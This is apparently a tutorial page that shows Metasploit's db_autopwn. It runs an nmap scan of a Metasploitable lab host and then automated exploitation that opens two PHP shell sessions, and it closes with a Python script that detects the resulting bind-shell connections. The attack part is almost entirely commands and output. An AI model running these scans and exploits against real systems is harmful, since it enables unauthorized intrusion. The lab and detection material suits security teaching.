# Autopwn

## Introduction

## Autopwn

## Execution
```
# svn update /opt/metasploit3/msf3/
# msfconsole
msf > db_nmap -PN -sS -sV 192.168.1.50

Interesting ports on 192.168.1.50:
Not shown: 988 closed ports
PORT     STATE SERVICE     VERSION
21/tcp   open  ftp         ProFTPD 1.3.1
22/tcp   open  ssh         OpenSSH 4.7p1 Debian 8ubuntu1 (protocol 2.0)
23/tcp   open  telnet      Linux telnetd
25/tcp   open  smtp        Postfix smtpd
53/tcp   open  domain      ISC BIND 9.4.2
80/tcp   open  http        Apache httpd 2.2.8 ((Ubuntu) PHP/5.2.4-2ubuntu5.10 with Suhosin-Patch)
139/tcp  open  netbios-ssn Samba smbd 3.X (workgroup: WORKGROUP)
445/tcp  open  netbios-ssn Samba smbd 3.X (workgroup: WORKGROUP)
3306/tcp open  mysql       MySQL 5.0.51a-3ubuntu5
5432/tcp open  postgresql  PostgreSQL DB
8009/tcp open  ajp13?
8180/tcp open  http        Apache Tomcat/Coyote JSP engine 1.1
MAC Address: 08:00:27:F7:38:97 (Cadmus Computer Systems)
Service Info: Host:  metasploitable.localdomain; OSs: Unix, Linux

msf > db_autopwn -h
[*] Usage: db_autopwn [options]
        -h          Display this help text
        -t          Show all matching exploit modules
        -x          Select modules based on vulnerability references
        -p          Select modules based on open ports
        -e          Launch exploits against all matched targets
        -r          Use a reverse connect shell
        -b          Use a bind shell on a random port (default)
        -q          Disable exploit module output
        -R  [rank]  Only run modules with a minimal rank
        -I  [range] Only exploit hosts inside this range
        -X  [range] Always exclude hosts inside this range
        -PI [range] Only exploit hosts with these ports open
        -PX [range] Always exclude hosts with these ports open
        -m  [regex] Only run modules whose name matches the regex
        -T  [secs]  Maximum runtime for any exploit in seconds
msf > db_autopwn -t -p -e
Active sessions
===============

  Id  Type       Connection                                Via
  --  ----       ----------                                ---
  1   shell php  192.168.1.100:40803 -> 192.168.1.50:5452  exploit/unix/webapp/tikiwiki_graph_formula_exec

msf > sessions -i 1
msf > db_autopwn -t -x -e
Active sessions
===============

  Id  Type       Connection                                 Via
  --  ----       ----------                                 ---
  2   shell php  192.168.1.100:39008 -> 192.168.1.50:12186  exploit/unix/webapp/tikiwiki_graph_formula_exec

msf > sessions -i 2
```
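
From the defender's side, the default `-b` bind shell appears as a connection to a port the host was not listening on at scan time: the two session ports above (5452 and 12186) are absent from the nmap service list. The Python below is an added example, not part of the original post; the flow-record format and the function names are assumptions, and it flags inbound connections to ports outside the scanned baseline.

```python
import re

# Listener baseline: port, state and service columns of the db_nmap output above.
NMAP_OUTPUT = """\
21/tcp   open  ftp
22/tcp   open  ssh
23/tcp   open  telnet
25/tcp   open  smtp
53/tcp   open  domain
80/tcp   open  http
139/tcp  open  netbios-ssn
445/tcp  open  netbios-ssn
3306/tcp open  mysql
5432/tcp open  postgresql
8009/tcp open  ajp13?
8180/tcp open  http
"""

# Flow records; the first two are the session connections shown above.
FLOWS = [
    "192.168.1.100:40803 -> 192.168.1.50:5452",
    "192.168.1.100:39008 -> 192.168.1.50:12186",
    "192.168.1.100:51514 -> 192.168.1.50:80",    # constructed: normal web traffic
    "192.168.1.50:33012 -> 192.168.1.100:445",   # constructed: outbound, ignored
]

PORT_LINE = re.compile(r"^(\d+)/tcp\s+open\b", re.M)
FLOW_LINE = re.compile(r"^(\S+):(\d+) -> (\S+):(\d+)$")


def baseline_ports(nmap_text):
    """Return the set of TCP ports nmap reported open."""
    return {int(p) for p in PORT_LINE.findall(nmap_text)}


def unexpected_listeners(flows, host, baseline):
    """Inbound flows to `host` whose destination port is not in the baseline."""
    hits = []
    for m in filter(None, (FLOW_LINE.match(f.strip()) for f in flows)):
        src, _sport, dst, dport = m.groups()
        if dst == host and int(dport) not in baseline:
            hits.append((src, int(dport)))
    return hits


if __name__ == "__main__":
    base = baseline_ports(NMAP_OUTPUT)
    for src, port in unexpected_listeners(FLOWS, "192.168.1.50", base):
        print(f"new listener on 192.168.1.50:{port} reached from {src}")
```

Port 5452 is flagged even though it differs from the legitimate PostgreSQL port 5432 by one digit, which is easy to miss when reading connection logs by eye.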
